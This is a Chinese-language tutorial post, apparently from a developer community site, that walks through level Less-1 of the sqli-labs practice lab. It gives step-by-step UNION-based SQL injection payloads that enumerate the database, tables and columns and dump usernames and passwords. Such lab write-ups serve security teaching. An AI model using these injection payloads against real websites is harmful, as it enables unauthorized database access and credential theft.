备案控制台

开发者社区安全文章正文

sqli-lab教程Less-1

2024-01-25 87

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： sqli-lab教程Less-1

less-1

sqli-lab通过各种方式（整型注入，字符注入，布尔盲注，时间盲注，堆叠注入…）爆出库表字段拿到字段值。

学习sqli注入必备语句：

查库：select schema_name from information_schema.schemata

查表：select table_name from information_schema.tables where table_schema=‘security’（此处拿security库为例）

查字段：select column_name from information_schema.columns where table_name=‘users’（此处拿users表例）

查字段的值：select username,password from security.users（此处拿username，password字段为例）

1.加单引号看出，此处是用单引号包裹的，使用单引号注入

2.使用- -+闭合，回显恢复

3.使用order by语句判断列数

4.发现有三列

5.使用union select联合查询，把id改成一个不存在的值使得有回显位

?id=-1' union select 1,2,3 --+

6.进行爆库操作

?id=-1' union select 1,2,database() --+

7.进行爆表操作

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

group_concat：将所有的数据连接进行拼接后作为一行显示

where：指定库的位置

8.进行爆字段操作

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

9.进行爆字段值操作

?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+

concat_ws(’~’,A,B)

显示为(A~B)，用于区分用户名、密码

注入完成！这是方法之一，后期会出sqlmap工具等教程…

文章标签：

安全

数据安全/隐私保护

Brucye

目录

相关文章

API小知识

|

9月前

|

存储 API 数据库

使用Python开发获取商品销量详情API接口

本文介绍了使用Python开发获取商品销量详情的API接口方法，涵盖API接口概述、技术选型（Flask与FastAPI）、环境准备、API接口创建及调用淘宝开放平台API等内容。通过示例代码，详细说明了如何构建和调用API，以及开发过程中需要注意的事项，如数据库连接、API权限、错误处理、安全性和性能优化等。

API小知识

375 5 5

我不是游客20240119

|

传感器人工智能搜索推荐

移动应用开发的未来趋势：人工智能与物联网的融合

【4月更文挑战第7天】随着科技的不断发展，移动应用开发正面临着新的挑战和机遇。本文将探讨人工智能（AI）和物联网（IoT）在移动应用开发中的融合，以及这一趋势如何影响未来的移动应用。我们将分析AI和IoT技术的关键特性，以及它们如何相互补充，为移动应用带来前所未有的智能化和互联性。此外，我们还将讨论开发者如何利用这些技术为用户提供更智能、更便捷的服务。

我不是游客20240119

284 1 1

郑小健

|

存储安全算法

MD5的日常实践应用：确保数据完整性与基础安全校验

**MD5概览：** 作为过时但仍然流行的散列函数，MD5用于生成数据固定长度的散列，常用于文件完整性校验和非安全密码验证。虽因易受碰撞攻击而不适于安全用途，但在低敏感场景下仍有应用。例如，Python代码展示如何计算文件MD5校验和及模拟MD5密码验证。不过，对于高安全需求，推荐使用SHA-256等更安全的算法。【6月更文挑战第17天】

郑小健

1120 1 1

请看我回答~

|

监控安全测试技术

网络堡垒的构筑者：洞悉网络安全与信息安全

【5月更文挑战第28天】在数字化时代的浪潮中，每一次数据交换都潜藏着风险。本文深入探讨了网络安全的核心议题，从漏洞挖掘到防御策略，再到加密技术的不断进化，以及安全意识在个体和组织层面的重要性。通过分析当前的挑战和未来的发展趋势，我们旨在为读者提供一个关于如何维护网络环境安全的全面视角。

请看我回答~

89 0 0

秋天风景

|

JavaScript 前端开发 HTML5

Pexels Videos – 可以免费商业使用的短视频

　　Pexels 是一个巨大的平台，提供免费的精美照片，很多设计师和博客每天用它来寻找他们的个人和商业项目的照片。现在我们想介绍 Pexels 视频，他是用来帮助你找到免费的视频。所有的 Pexels 视频根据 CC0 许可证授权，包括商业使用在内的任何目的都可以免费使用。

秋天风景

1777 0 0

Pexels Videos – 可以免费商业使用的短视频

技术小胖子

|

Linux 数据安全/隐私保护

linux 查看某个用户账户过期信息

技术小胖子

1086 0 0

sp42

|

JavaScript C++ 编译器

进化 TypeScript

首先想说的是学习 TS 之前得先会 JS，因为是 TS 是 JS 的 superset。如同 C++ 是 C 的 superset 那样。另外就是这门语言没那么痛苦，增加的东西不是很多，这样学习曲线就应该比较平缓了。

sp42

860 0 0

南瓜佬

|

12天前

|

弹性计算关系型数据库微服务

基于 Docker 与 Kubernetes（K3s）的微服务：阿里云生产环境扩容实践

在微服务架构中，如何实现“稳定扩容”与“成本可控”是企业面临的核心挑战。本文结合 Python FastAPI 微服务实战，详解如何基于阿里云基础设施，利用 Docker 封装服务、K3s 实现容器编排，构建生产级微服务架构。内容涵盖容器构建、集群部署、自动扩缩容、可观测性等关键环节，适配阿里云资源特性与服务生态，助力企业打造低成本、高可靠、易扩展的微服务解决方案。

南瓜佬

1246 5 26

modelscope

|

11天前

|

机器学习/深度学习人工智能前端开发

通义DeepResearch全面开源！同步分享可落地的高阶Agent构建方法论

通义研究团队开源发布通义 DeepResearch —— 首个在性能上可与 OpenAI DeepResearch 相媲美、并在多项权威基准测试中取得领先表现的全开源 Web Agent。

modelscope

1258 87 98

热门文章

最新文章

轻量应用服务器支持带宽套餐升级至流量包套餐流程说明

阿里企业邮箱登录入口地址

Flink on YARN（上）：一张图轻松掌握基础架构与启动流程

【实测】windows安装部署go实录（超详细）

业内首款云原生技术中台产品云原生 Stack 来了！

网络编程--基础TCP

GNU make manual 翻译( 一百四十七)

Linux学习（一）：查看文件目录的几种常用方式

Dalvik 虚拟机的垃圾收集简介

StarRocks：Connect Data Analytics with the World

当AI遇上癌症：聊聊个性化治疗的新可能

别再满世界找日志了：聊聊如何用AI帮运维团队快速排查故障

数据才是真救命的：聊聊如何用大数据提升灾难预警的精准度

《AI协同供应链调度困局：从需求拆解到落地增效的全流程实践》

基于springboot的大学生创新能力比赛系统

AI智能体框架怎么选？7个主流工具详细对比解析

当MySQL遇见AI：使用Vector扩展实现智能语义搜索

基于python的网络课程在线学习交流系统

Github 12.3kstar, 3分钟起步做中后台？Go+Vue 脚手架，把权限、代码生成、RBAC 都封装好了

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

2025云栖大会，阿里云百炼邀请您的参与和见证